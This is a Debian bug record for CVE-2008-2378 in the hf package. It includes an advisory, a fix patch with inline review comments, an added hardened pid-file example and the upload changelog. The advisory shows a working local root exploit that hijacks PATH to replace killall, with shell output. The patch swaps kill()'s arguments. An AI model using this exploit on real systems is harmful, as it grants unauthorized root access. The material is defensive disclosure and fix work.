
Bug#504182: marked as done (hf: CVE-2008-2378 insecure system call leading to local root)



Your message dated Wed, 05 Nov 2008 21:02:48 +0000
with message-id <E1KxpWa-00065A-Dz@ries.debian.org>
and subject line Bug#504182: fixed in hf 0.8-8.1
has caused the Debian Bug report #504182,
regarding hf: CVE-2008-2378 insecure system call leading to local root
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact owner@bugs.debian.org
immediately.)


-- 
504182: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=504182
Debian Bug Tracking System
Contact owner@bugs.debian.org with problems
--- Begin Message ---
Source: hf
Severity: grave
Tags: security

----- Forwarded message from Steve Kemp <skx@debian.org> -----

From: Steve Kemp <skx@debian.org>
To: secure-testing-team@lists.alioth.debian.org
User-Agent: Mutt/1.5.17+20080114 (2008-01-14)
Cc: hf@packages.debian.org, team@security.debian.org
Subject: [Secure-testing-team] hf - CVE-2008-2378 - local root exploit


 The hf package, described by Debian as an amateur-radio protocol suite
 using a soundcard as a modem, is a program that eventually becomes
 setuid(0), and has a trivial security hole in it.

 By default the package installs "/usr/bin/hfkernel" as a typical binary,
 but when first started via the program "hf" the binary is changed to
 be setuid(root).

 This is demonstrated:

skx@gold:~$ hf
Hello I am hf, the startscript for hfterm & hfkernel.
I look for them in /usr/bin. If wrong, edit me.
hfkernel must run with root rights.
The suid bit has to be set. Be aware that this can be a security hole.
Please do as root "chmod 4755 /usr/bin/hfkernel".
or start this script again as root.


 If you do start the program as root the permissions are changed:

skx@gold:~$ sudo hf
Hello I am hf, the startscript for hfterm & hfkernel.
I look for them in /usr/bin. If wrong, edit me.
hfkernel must run with root rights.
The suid bit has to be set. But be aware that this can be a security hole.
I will do this now "chmod 4755 /usr/bin/hfkernel".
For you, root, I will start only hfkernel for test purposes.
...

  Now the program is setuid:

skx@gold:~$ ls -l /usr/bin/hfkernel
-rwsr-xr-x 1 root root 244120 2008-05-07 19:37 /usr/bin/hfkernel


  Unfortunately the hfkernel program contains a trivial root hole:

int main(int argc, char *argv[])
{
        // snip

        while ((c = getopt(argc, argv, "a:M:c:klhip:m:nt:s:r:Rf23")) != -1)
            switch (c) {

            // snip

                case 'k':
                    /* runs "killall" through /bin/sh, so the caller's PATH
                     * decides which binary executes while euid is 0 */
                    system ("killall hfkernel");

            // snip
}

  Creating ~/bin/killall is sufficient to gain root privileges.

skx@gold:~$ echo -e '#!/bin/sh\n/bin/sh' > ~bin/killall
skx@gold:~$ chmod 755 ~/bin/killall
skx@gold:~$ hfkernel -k
sh-3.2# id
uid=1000(skx) gid=1000(skx) euid=0(root)


  This has been given the identifier CVE-2008-2378.

  Below is the patch that I've come up with to fix this hole, which
 is a simple pidfile approach.  Unless anybody has any comments
 I'll upload a fix for Etch on Monday/Tuesday.

Steve
--


--- hf-0.8/hfkernel/main.c	2006-12-22 10:44:23.000000000 +0000
+++ hf-0.8.orig/hfkernel/main.c	2008-11-01 10:33:44.000000000 +0000
@@ -7,19 +7,7 @@
  *      Copyright (C) 1996  Thomas Sailer (sailer@ife.ee.ethz.ch)
  *      Swiss Federal Institute of Technology (ETH), Electronics Lab
  *	modified by Gnther Montag
- *      This program is free software; you can redistribute it and/or modify
- *      it under the terms of the GNU General Public License as published by
- *      the Free Software Foundation; either version 2 of the License, or
- *      (at your option) any later version.
- *
- *      This program is distributed in the hope that it will be useful,
- *      but WITHOUT ANY WARRANTY; without even the implied warranty of
- *      MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
- *      GNU General Public License for more details.
- *
- *      You should have received a copy of the GNU General Public License
- *      along with this program; if not, write to the Free Software
- *      Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
+ *      This program is free software; you can redistribute it and/or modify
 *      it under the terms of the GNU General Public License as published by
 *      the Free Software Foundation; either version 2 of the License, or
 *      (at your option) any later version.
 *
 *      This program is distributed in the hope that it will be useful,
 *      but WITHOUT ANY WARRANTY; without even the implied warranty of
 *      MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *      GNU General Public License for more details.
 *
 *      You should have received a copy of the GNU General Public License
 *      along with this program; if not, write to the Free Software
 *      Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
  *
  */
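Review bot: this whole hunk is whitespace-only churn of the license header (every removed `- *      ...` line is re-added with one less leading space, starting at `+ *      This program is free software`), which is unrelated to the security fix and doubles the size of the diff; drop it so the patch shows only the functional change.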
@@ -78,6 +66,11 @@
 #include "alsa.h"
 #endif /* HAVE_ALSA_ASOUNDLIB_H */
 
+#ifndef PID_FILE
+# define PID_FILE "/var/run/hfkernel.pid"
+#endif
+
+
 /* --------------------------------------------------------------------- */
 
 /* these variables take hfkernel's options */
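Review bot: the safety of the pid-file approach rests on `/var/run/hfkernel.pid` living in a directory that only root can write, so an unprivileged caller cannot plant a file there; state that assumption in a comment next to `# define PID_FILE "/var/run/hfkernel.pid"`, and make sure `<fcntl.h>`, `<signal.h>`, `<string.h>` and `<unistd.h>` are included for the `open`, `kill`, `strlen` and `write` calls the later hunk introduces, since this hunk does not add them.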
@@ -154,6 +147,49 @@
 	}
 }
 
+void kill_daemon()
+{
+	FILE *f;
+	int pid;
+
+	if (!(f = fopen (PID_FILE, "r")))
+        {
+                 errstr( SEV_FATAL, "Failed to read from PID file");
+                  exit(1);
+        }
+	fscanf (f, "%d", &pid);
+	fclose (f);
+
+        kill( SIGKILL, pid );
+        unlink( PID_FILE );
+        exit(1);
+}
+
+
+int write_pid()
+{
+	char buf[20];
+	int fd;
+	long pid;
+
+	if ((fd = open (PID_FILE, O_CREAT | O_TRUNC | O_WRONLY, 0600)) == -1)
+	{
+                errstr (SEV_FATAL, "cannot open pidfile for writing ");
+                exit(1);
+	}
+        else
+        {
+		pid = getpid ();
+		snprintf (buf, sizeof (buf), "%ld", (long) pid);
+		if (write (fd, buf, strlen (buf)) != strlen (buf))
+                {
+                       errstr (SEV_FATAL, "cannot write to pidfile ");
+                       exit(1);
+                }
+		close(fd);
+	}
+	return pid;
+}
 
 /* --------------------------------------------------------------------- */
 
@@ -529,8 +565,8 @@
                     break;
 
                 case 'k':
-                    system ("killall hfkernel");
-
+                     kill_daemon();
+                     break;
                 case 'l':
                     logging = 1;
                     break;
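Review bot: `kill_daemon();` never returns (every path ends in `exit`), so the added `break;` is unreachable though harmless; more importantly, `-k` now aborts with SEV_FATAL when the pid file is absent, which is the normal state when hfkernel is simply not running, whereas the old `killall` was silent in that case. Consider reporting "not running" and exiting 0 instead of treating a missing pid file as a fatal error.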
@@ -635,6 +671,7 @@
 
                 exit(1);
         }
+
         if (logging)
                 openlog("hfkernel", LOG_PID, LOG_DAEMON);
 	printf("hfkernel %s starting...\n", PACKAGE_VERSION);
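Review bot: this hunk only inserts a blank line before `if (logging)` and carries no functional change; drop it from the security fix to keep the diff minimal.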
@@ -699,6 +736,8 @@
 
 	printf("Note: hfkernel is only part of the hf package.\n"); 
 	printf("It is controlled by the graphic terminal hfterm. To start them both, use the start script hf. In newer linuxes (kernel 2.6...) we need the syntax\n ÂŽLD_ASDSUME_KERNEL=2.2.5 hftermÂŽ, this is already prepared in the hf script. \n");
+        write_pid();
+
 	start_io_thread();
 	exit(0); }
 
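Review bot: `write_pid();` creates the pid file but nothing in the patch removes it on a normal exit or on a fatal signal (only kill_daemon unlinks it), so a stale file will remain after an unclean shutdown and the next `-k` will signal whichever process has since reused that pid; register an `atexit()` handler or unlink the file in the shutdown path, and consider checking `write_pid()`'s return value rather than relying on it calling `exit(1)` internally.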

_______________________________________________
Secure-testing-team mailing list
Secure-testing-team@lists.alioth.debian.org
http://lists.alioth.debian.org/mailman/listinfo/secure-testing-team

----- End forwarded message -----

-- 
Nico Golde - http://www.ngolde.de - nion@jabber.ccc.de - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.



--- End Message ---
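The report above boils down to one pattern: a setuid-root program calling `system("killall hfkernel")`, which runs a shell that resolves `killall` through the caller's PATH. The following is an added example written for this page; it is not code from the hf package, from Steve Kemp's patch, or from the Debian bug thread. It shows the replacement a defender would want for the `-k` option: no shell and no PATH lookup, a pid file opened with `O_NOFOLLOW` and checked with `fstat()` for the expected owner and permissions, strict parsing that rejects values of 0 or below (which `kill()` would interpret as a process group or every process), the correct `kill(pid, sig)` argument order, SIGTERM rather than SIGKILL, and handling of a stale pid file. The function names, the `owner` parameter (a real daemon would pass 0 for root) and the `/tmp` demo path in `main` are assumptions made for the example.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
/* Added example, not part of the hf package or its patch. */
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Parse a pid from text. Rejects empty input, trailing junk other than
 * whitespace, and any value <= 1: kill() treats 0 and negative numbers as
 * process-group or "every process" targets, which a setuid-root program
 * must never send based on a file it did not fully validate. */
int parse_pid(const char *text, pid_t *out)
{
    char *end;
    long v;

    if (text == NULL || *text == '\0')
        return -1;
    errno = 0;
    v = strtol(text, &end, 10);
    if (errno != 0 || end == text)
        return -1;
    while (*end == ' ' || *end == '\n' || *end == '\t' || *end == '\r')
        end++;
    if (*end != '\0' || v <= 1 || v > INT_MAX)
        return -1;
    *out = (pid_t)v;
    return 0;
}

/* Read and validate the pid file. O_NOFOLLOW refuses a symlink planted in
 * its place, and fstat() on the open descriptor (no TOCTOU window) only
 * trusts a regular file owned by `owner` that others cannot write. */
int read_pidfile(const char *path, uid_t owner, pid_t *out)
{
    char buf[32];
    struct stat st;
    ssize_t n;
    int fd;

    fd = open(path, O_RDONLY | O_NOFOLLOW);
    if (fd == -1)
        return -1;
    if (fstat(fd, &st) == -1 || !S_ISREG(st.st_mode) ||
        st.st_uid != owner || (st.st_mode & (S_IWGRP | S_IWOTH))) {
        close(fd);
        return -1;
    }
    n = read(fd, buf, sizeof buf - 1);
    close(fd);
    if (n <= 0)
        return -1;
    buf[n] = '\0';
    return parse_pid(buf, out);
}

/* Check that a process exists without touching it (signal 0). EPERM still
 * means "exists", just owned by someone else. */
int pid_is_alive(pid_t pid)
{
    return pid > 1 && (kill(pid, 0) == 0 || errno == EPERM);
}

/* Write this process's pid to `path`; never follows a pre-existing symlink. */
int write_pidfile(const char *path)
{
    char buf[32];
    int fd, len;

    fd = open(path, O_WRONLY | O_CREAT | O_TRUNC | O_NOFOLLOW, 0644);
    if (fd == -1)
        return -1;
    len = snprintf(buf, sizeof buf, "%ld\n", (long)getpid());
    if (len < 0 || write(fd, buf, (size_t)len) != len) {
        close(fd);
        unlink(path);
        return -1;
    }
    close(fd);
    return 0;
}

/* What the -k option should do instead of system("killall hfkernel").
 * Returns 0 when a live daemon was signalled, -1 otherwise. */
int stop_daemon(const char *path, uid_t owner)
{
    pid_t pid;

    if (read_pidfile(path, owner, &pid) != 0)
        return -1;              /* missing, untrusted or unparsable file */
    if (!pid_is_alive(pid)) {
        unlink(path);           /* stale file left by an unclean exit */
        return -1;
    }
    if (kill(pid, SIGTERM) == -1)
        return -1;
    unlink(path);
    return 0;
}

int main(void)
{
    /* Constructed demo path; a real daemon keeps its pid file under
     * /var/run, a directory only root can write, and passes owner 0. */
    const char *demo = "/tmp/hfkernel-example.pid";
    pid_t pid = 0;

    if (write_pidfile(demo) == 0 && read_pidfile(demo, getuid(), &pid) == 0)
        printf("pid file holds %ld, alive=%d\n", (long)pid, pid_is_alive(pid));
    unlink(demo);
    return 0;
}
```

The ownership check is what makes the pid file trustworthy: if any user could write it, a root process acting on its contents would be no safer than the original `system()` call. Pid reuse between the `kill(pid, 0)` probe and the `kill(pid, SIGTERM)` remains a small window; a daemon that also holds a lock on the pid file, or that is managed by an init system, closes it.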
--- Begin Message ---
Source: hf
Source-Version: 0.8-8.1

We believe that the bug you reported is fixed in the latest version of
hf, which is due to be installed in the Debian FTP archive:

hf_0.8-8.1.diff.gz
  to pool/main/h/hf/hf_0.8-8.1.diff.gz
hf_0.8-8.1.dsc
  to pool/main/h/hf/hf_0.8-8.1.dsc
hf_0.8-8.1_amd64.deb
  to pool/main/h/hf/hf_0.8-8.1_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 504182@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Nico Golde <nion@debian.org> (supplier of updated hf package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Wed, 05 Nov 2008 21:19:58 +0100
Source: hf
Binary: hf
Architecture: source amd64
Version: 0.8-8.1
Distribution: unstable
Urgency: high
Maintainer: Debian Hamradio Maintainers <debian-hams@lists.debian.org>
Changed-By: Nico Golde <nion@debian.org>
Description: 
 hf         - amateur-radio protocol suite using a soundcard as a modem
Closes: 504182
Changes: 
 hf (0.8-8.1) unstable; urgency=high
 .
   * Non-maintainer upload by the Security Team.
   * Fix local root security hole that is caused by an insecure call
     to the system function, thanks Steve Kemp for the patch
     (CVE-2008-2378; Closes: #504182).
Checksums-Sha1: 
 551137d242d3aa54fdc9d5e4860baf3a6d901ac5 1212 hf_0.8-8.1.dsc
 1f0eec520ca27db2fbd2efc8cf6b496ce0ad5197 126128 hf_0.8-8.1.diff.gz
 abcca04dc39871c43c84825cb9fea847b72d6b4c 681254 hf_0.8-8.1_amd64.deb
Checksums-Sha256: 
 36be9e4b38cd3b9428164d80817b46c10b7e7f4eb5fe9eee30c013559e9b1cec 1212 hf_0.8-8.1.dsc
 90728620ec02b70a4236d4f63bbfe86f04ec35c3db09c8f9048ce48f322eb2a8 126128 hf_0.8-8.1.diff.gz
 abb2ef7f75c5413daa5ad35b77ac056ed8ae135d6e50dac49de8ae3ff2db085e 681254 hf_0.8-8.1_amd64.deb
Files: 
 d6dc9fe5aaf6a9c5dd048e155b5a25f4 1212 hamradio optional hf_0.8-8.1.dsc
 a87b6c21a254bcd533d8e7c4b4f7f996 126128 hamradio optional hf_0.8-8.1.diff.gz
 92ed2485529738970c0a35b8be59cdb5 681254 hamradio optional hf_0.8-8.1_amd64.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAkkSASQACgkQHYflSXNkfP96nwCghgmz14682qg/7PCprto1wm25
z9YAoI776e+MhOJNjOQ1wEiKajUhHtiE
=7zZJ
-----END PGP SIGNATURE-----



--- End Message ---
